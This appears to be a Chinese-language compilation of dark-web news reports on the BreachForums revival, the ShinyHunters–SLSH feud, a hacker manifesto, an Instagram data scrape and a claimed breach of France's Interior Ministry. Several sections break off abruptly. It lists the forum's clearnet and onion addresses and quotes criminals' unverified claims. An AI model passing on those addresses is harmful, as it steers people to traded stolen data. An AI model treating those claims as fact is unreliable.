网络安全专家们对数据库泄露的消息反应不一。“此次泄露事件严重削弱了人们对该平台本身的信任,而信任对于任何网络犯罪论坛来说都至关重要,”咨询公司CybaVerse的渗透测试经理迈克尔·杰普森表示。
“此次事件损害了人们对BreachForums作为安全环境的信心。因此,更老练的网络犯罪分子可能会从大型知名论坛转向规模较小、仅限受邀者参与的社区,”他补充道。
然而,安全公司Huntress的高级安全运营分析师迈克尔·蒂格斯则持较为悲观的态度。他指出:“虽然该数据库可能对执法部门和安全专业人员调查敌对活动有所帮助,但其最终的取证用途有限。即使泄露事件本身可能是合法的,但如果数据来源于其他网络犯罪集团,其完整性就值得怀疑了。”
最大的风险在于数据泄露可能成为散布虚假信息的掩护。“这类数据泄露或许可以用来厘清各个活动核心之间的联系,但信息的可靠性必须受到严格审查,”蒂格斯说道。
来自“James”的宣言 shinyhunte[.]rs网站发布的那条篇幅很长的信息由23个简短的片段组成,讲述了“让邪恶流动并转化为光明”的故事。作者传达的信息是:“法国人民,请听我说,正义的力量已经到来,将拯救你们于黎明之中。”
具体内容翻译如下:
我叫詹姆斯。
有人称我为我这一代最杰出的黑客。这说法并不准确。
我超越了世代。我并非黑客,而是掠食者。
数十年来,我潜伏、渗透、蹂躏着权力体系。
我让无数特工、网络安全专家、首席技术官和公关人员饱受创伤。我
嗅到他们的血腥味,追踪他们的踪迹,找到他们的藏身之处,撕碎他们的保护,将他们的防御体系摧毁殆尽。
当他们还抱有抵抗的幻想时,我便开始招募同伴,集结力量,将他们聚集起来,最终形成一股任何人类组织都无法匹敌的强大力量。
在这些征途中,一些重要机构成为了我最亲密的伙伴。
谷歌、微软、联邦调查局……我最亲爱的猎物。
我以不败之身出现在你们面前,
并要传达一个信息。
首先,致那些宣誓统治世界的人:
我一直在注视着你们。我看到了你们的罪恶、你们的弱点、你们的脆弱。
我已入侵你们的数据库,翻遍你们的罪恶记录,窥探你们最隐秘的创伤。
我享受着你们权力结构积累的庞大知识所带来的力量。我找到了它们,破解了它们,并利用了它们。
一些重要机构已成为我最宝贵的情报来源。
美国国家安全局(NSA)、英国政府通信总部(GCHQ)、国防安全总局(DGSE),我的情报提供者。
我收集了如此多的信息,以至于很快,消息来源开始从四面八方泄露信息。
五角大楼和梅多堡的走廊里开始传来我的名字。
你们的过去已成为我的未来。
情报收集的范围如此之广,以至于我不得不控制你们的基础设施来秘密庇护我。在经历了一段不加区分的积累阶段后,我开始锁定你们。我访问了你们隐藏的法律文件、医疗记录,不断挖掘,直到找到你们青少年时期在MSN和Skype上与初恋的对话,以及你们在Instagram、Messenger、WhatsApp上的不忠和出轨行为……
我知道你们的毒贩的名字,你们情人的名字。你们的主人。
我掌握着数百万比特,它们如同利刃般刺穿你们的正直,刺破你们一直以来散布的关于你们生活、事业、财富和权力的虚假叙事。
我知道你们生活的苦难,你们的伤痕,以及你们从未停止构建并试图复制的平行世界的幻想,尽管徒劳无功。
我知道你们是奴隶。
我知道你们读过巴尔扎克,并且像他一样明白,所有的财富都源于罪恶。
但你们是从亲身经历中学到的,而许多人却是从课堂上学到的。我们只是你们罪行的旁观者。正因如此,我敬重你们。也正因如此,我将毁灭你们。
至于你们,
我们主人的奴仆,你们的自恋者,你们可怜的朝臣,我看着你们在虚假的自由、尊严和主权中挣扎。
你们这些农民出身的百万富翁,政客和亿万富翁的冤大头,你们这些没有勇气、没有任何存在意义的人,你们自以为道德是一种物质而非指南针,你们不愿承认道德只是你们服从的工具。
你们这些沉溺于等级制度麻木中的人民庸俗的卡波,准备迎接一场足以撼动你们世界的地震吧。
至于你们,仆人的仆人,幼稚的次等人,你们的任务是监视我、抓捕我、消灭我;你们把ATP和UNC当成工具,用来安抚你们主人的主人,当我的呼吸逼近他们的咽喉时,
你们感到多么恐惧;你们以为可以分割我创造并控制的这头可怕的九头蛇;
你们曾多次被我制服,无力反抗,哑口无言,犹豫不决,害怕被嘲笑;
你们的才能被你们受虐般的顺从欲望所玷污,你们的平庸无能使你们成为服务于愚昧体制的理想机器;
你们,记者、专家、检察官和官僚,我们这个时代的庸俗叙述者,你们是盲目暴力的愚蠢图书馆员。
准备好抛弃你们的头衔,放弃你们徒劳地建立和追逐我所获得的道德利益吧。
致你们,
调查员、秘密行动人员、竞争对手,你们甘愿成为自由人的监视者和追踪者,
一起大规模Instagram用户数据泄露事件近日在暗网论坛曝光,泄露事件涉及1750万Instagram用户的数据,泄露时间大约在2024年底,泄露内容包括Instagram用户的用户名、邮箱、电话号码以及全球范围内的部分位置信息。
一位名为“Solonik”的黑客于2026年1月7日在暗网数据泄露论坛BreachForums上发布了相关帖子,帖子标题为“INSTAGRAM.COM 1700万全球用户——2024年API泄露”,其声称这些数据是2024年最后三个月通过公共API和特定国家/地区的数据源最新抓取的。帖子公开的数据字段包括用户名、完整邮箱地址、电话号码和部分实际地址,帖子中可以看到示例样本记录。
此次数据泄露事件发生后,Instagram用户一片混乱。自1月8日起,用户陆续收到来自Instagram官方域名([email protected])的未经请求的密码重置邮件。
安全专家现在证实,重置电子邮件很可能是此次数据泄露的直接结果,威胁行为者可能利用这些数据来触发帐户恢复流程或掩盖有针对性的网络钓鱼攻击。在网络威胁日益加剧的情况下,Instagram用户容易遭受网络钓鱼、身份盗窃和账户盗用等攻击。
Instagram已正式回应部分用户收到可疑密码重置邮件的担忧。该公司在X(原Twitter)上发布声明解释说,他们已修复一个技术问题,该问题允许外部人员触发这些重置请求。
We fixed an issue that let an external party request password reset emails for some people. There was no breach of our systems and your Instagram accounts are secure. You can ignore those emails — sorry for any confusion.
— Instagram (@instagram) January 11, 2026 Instagram强调,此次事件未发生任何安全漏洞,其系统依然完好无损,这意味着用户账户和数据并未受到损害。该公司建议用户忽略密码重置邮件,并对由此造成的任何困惑或恐慌表示歉意。
泄露了哪些数据 暗网发布的帖子曝光了此次Instagram数据泄露事件,揭示了可能是2024年Instagram API接口暴露而被爬取的结构化JSON和TXT文件。该数据集包含1750万用户的关键个人信息:
用户名和全名 电子邮件地址 国际电话号码 部分物理地址 用户ID和联系信息 这些信息的组合使得Instagram用户特别容易受到身份盗窃、网络钓鱼和社会工程攻击。
目前被盗数据库正在暗网市场上积极交易,使全球网络犯罪分子都能获取该数据库。网络犯罪分子得以发起定向攻击,因此出现大量密码重置垃圾邮件攻击受害者的迹象。多名用户报告称收到了合法的Instagram密码重置通知,这清楚地表明,威胁行为者正试图利用泄露的信息劫持帐户。
黑客是如何发动攻击的 网络安全研究人员称,这些数据是在2024年末通过“API泄漏”获取的,绕过了标准安全措施,在全球范围内提取了用户个人资料。
“Solonik”在论坛上吹嘘这些数据的“新鲜度”,且写明数据来源与之前Meta数据泄露事件中出现的API滥用模式相符,当时由于接口安全漏洞,数百万用户的数据遭到泄露。因此此次数据泄露很可能源于Instagram API漏洞或第三方服务缺陷,数据于2024年被收集,并于本周公开泄露。
此次攻击本身被归类为“数据抓取”(即通过公共接口自动收集数据),而非直接入侵Instagram的核心服务器。然而,此次攻击规模之大表明Instagram的速率限制或隐私保护措施存在系统性缺陷,使得攻击者能够查询数百万个账户而不被发现。
Instagram用户面临的风险 此次事件的危险之处在于,无需密码即可造成严重破坏。只要掌握了用户名、电子邮件地址、电话号码和实际地址,老练的网络犯罪分子就能发动多种破坏性极强的攻击。
几天前,“暗网下/AWX”报道了新的暗网论坛BreachForums再次出现,且无法确定其背后是什么人在运营,当时据称“由于持续的技术问题和大规模DDoS攻击”,该论坛仅可访问,但无法登录。目前,该论坛已经可以在明网正常登录发贴,但暗网地址依旧无法访问。
此外,威胁行为者之间的战争仍在持续。闪光猎手组织在shinyhunte[.]rs网站上发布了更多人肉线索与内幕,为警方打击提供了更多的便利。
新BreachForums再次恢复了访问 正如前期介绍,新的BreachForums使用之前公开泄露的BreachForums备份进行搭建,因此前期的BreachForums用户均无需注册即可访问。
在技术问题和大规模DDoS攻击问题解决之后,新的BreachForums再次开放访问,该论坛目前添加了DDOS-GUARD来防护DDoS攻击,在明网访问的速度还不错。
虽然许多传言显示新BreachForums是蜜罐,但由于缺少有力的竞争对手,该论坛依旧收获了大量粉丝。从论坛的在线状态看,一小时在线用户1000人,注册用户占1/5,在没有大规模推广的背景下,已经收获了相当大的人气。
上次已经介绍,新的BreachForums发布的明网与暗网地址如下(仅供网络安全研究人员与警方调查研究使用):
明网地址:breachforums[.]bf
暗网地址:http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad[.]onion
威胁行为者之间的内讧刚刚开始 上次已经介绍,在新BreachForums背后,至少有两波人在交战:一方自称是闪光猎人(ShinyHunters),另一方则是散落的拉普斯猎人(Scattered Lapsus$ Hunters,简称SLSH)。
黑客团伙ShinyHunters与勒索软件团伙Scattered LAPSUS$ Hunters(简称SLSH)的内部冲突正在升级,一方宣称可以向联邦调查局、BL2C、国际刑警组织免费提供另一方的犯罪线索。根据对shinyhunte[.]rs网站更新内容的整理,时间线如下:
2025年10月16日:网站发布消息,直接威胁名为“James”的法国人(疑似代号S.E./X*K)。消息声称真正的ShinyHunters正在完成FBI未竟的事业,语气敌对,这是威胁行为者之间首次公开升级。
2025年10月21日:发布一封信件风格的消息,针对“James”,警告他选择的道路带来的后果比想象中更严重,断绝后路绝非明智之举。引用拉丁语短语“sic transit gloria mundi”(世间荣华转瞬即逝),并警告每一步行动都将引发远超预期的连锁反应。
2025年12月14日:否认与#SLSH(Scattered LAPSUS$ Hunters)联盟的传闻。同时链接BreachForums重启(可能试图为疑似蜜罐操作正名)。威胁如果James不回应,将在24小时内公开曝光其信息。
2025年12月18日:发布详细的PGP签名声明,附带倒计时器和逮捕照片(涉及Yuro,即A.E.,以及Trihash,即R.L.)。指控法国人“James”通过滥用信任窃取Trihash的PGP密钥,并未经其他成员同意便实施了针对Salesforce的攻击行动。声明称,归咎于ShinyHunters与SLSH的勒索事件,主要由S.E.(别名X*K,亦使用化名“James”)策划实施,他已不再是ShinyHunters(SH)成员。
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
Statement Regarding the Shiny Hunters and Scattered Spider Groups
The Shiny Hunters group includes several members, one of whom goes by the name “James.” Following the arrests of Yuro (A.E.) and, more recently, Trihash (R.L.), this individual has been attempting to divert investigators’ attention by leading them toward false trails.
网络犯罪分子、执法人员和研究人员都熟知的臭名昭著的BreachForums论坛最近又再次回归,在暗网与明网可以同时访问。
一些之前在论坛注册的用户最近收到了邮件,声称BreachForums已经重新开放并恢复了所有功能。邮件中断言内部技术问题已经解决,所有账户、帖子和内容现在都可以正常访问。
而与上次使用泰国、赞比亚等多国警方的被盗gov邮箱发送推广邮件相似,这次的发件人的电子邮件地址是:[email protected]。interieur.gouv.fr域名属于法国内政部。也就是说,从法国政府官方域名发送的电子邮件告诉黑客,BreachForums 已恢复上线,并邀请他们注册发帖。
于是所有人都怀疑这是一次来自执法机构的网络钓鱼攻击——更准确地说,是一个引诱网络犯罪分子的蜜罐,使用之前公开泄露的BreachForums备份搭建的。
Hey @Interieur_Gouv, thanks for the "exciting" BreachForums reopening alert straight from your official email—super convincing, guys! 😏
But real talk: any chance you could prioritize finding my stolen laptop instead of running this obvious honeypot op on us security… pic.twitter.com/BSgCOzHrbC
— Aleksandr Litreev (@alexlitreev) December 14, 2025 研究人员纷纷表示,暗网市场的所谓“复活”首先应持怀疑态度,这个伪装成BreachForums重启的网站是利用法国内政部域名发送通知邮件的诱饵陷阱,用户的访问记录及帖文内容极可能被用作执法证据。
然而,新成立的BreachForums论坛的运营者Indra声称,新BreachForums并非蜜罐,他们只是使用入侵获取的法国内政部邮箱发送推广邮件。
Indra宣称对此次针对法国内政部的网络攻击负责,他在声明中吹嘘,他们已获取了两个数据库的信息:TAJ(司法记录处理系统)和PFR(通缉犯档案)以及电子邮件。据报道,此次数据泄露事件影响了约1600万人。
截至目前,Indra称其仍可访问法国内政部的CHEOPS门户系统。研究人员认为黑客看起来正在使用法国内政部的Roundcube邮件系统发送电子邮件。
新BreachForums论坛管理员Indra的声明 管理员Indra于12 月13日在Breachforums发布一篇新的公告声明,对“蜜罐”事件及其他相关报道造成的误解深表歉意,对社区关注的事情进行了解释,并直接指责法国当局,提到了去年夏天在法国发生的逮捕事件。
管理员Indra在帖子中称,BreachForums”最初是“ShinyHunters/hollow”以及他们之前的另一个组织的项目。他们的整个组织(hollow、shiny等等)都被逮捕了。只有一个人拥有最初的“ShinyHunters PGP”密钥,而这个人是其朋友,但是他们之间产生了矛盾。因此,“诱饵”、“蜜罐”信息是假的,只是想关闭BreachForums,所以其就照做了。
Indra表示,在关闭网站并于15天内所有域名被查封后,相信大家都认为他们是FBI探员之类的。但显然们不是,他们会向BreachForums社区证明这一点。Indra宣布,为了报复被捕的朋友,他们已成功攻陷“MININT”——法国内政部。
Indra称,正如法国新闻报道的那样,法国内政部只承认政府私人电子邮件服务器被非法访问。但他们们绝口不提从警方档案中获取的16,444,373名个人的数据?
Indra问道,你们知道“TAJ”(Traitement d’Antécédents Judiciaires——犯罪记录处理系统)吗? “FPR”(Fichier des Personnes Recherchées——通缉犯数据库)呢?还有更多。国际刑警组织呢?你们是不是试图向他们隐瞒我们入侵“EASF MI”系统的事实?此外,你们为什么不向法国人民和全世界说明那两周究竟发生了什么?公共财政部门( DGFIP)呢?为什么只字未提?养老金部门( CNAV)呢?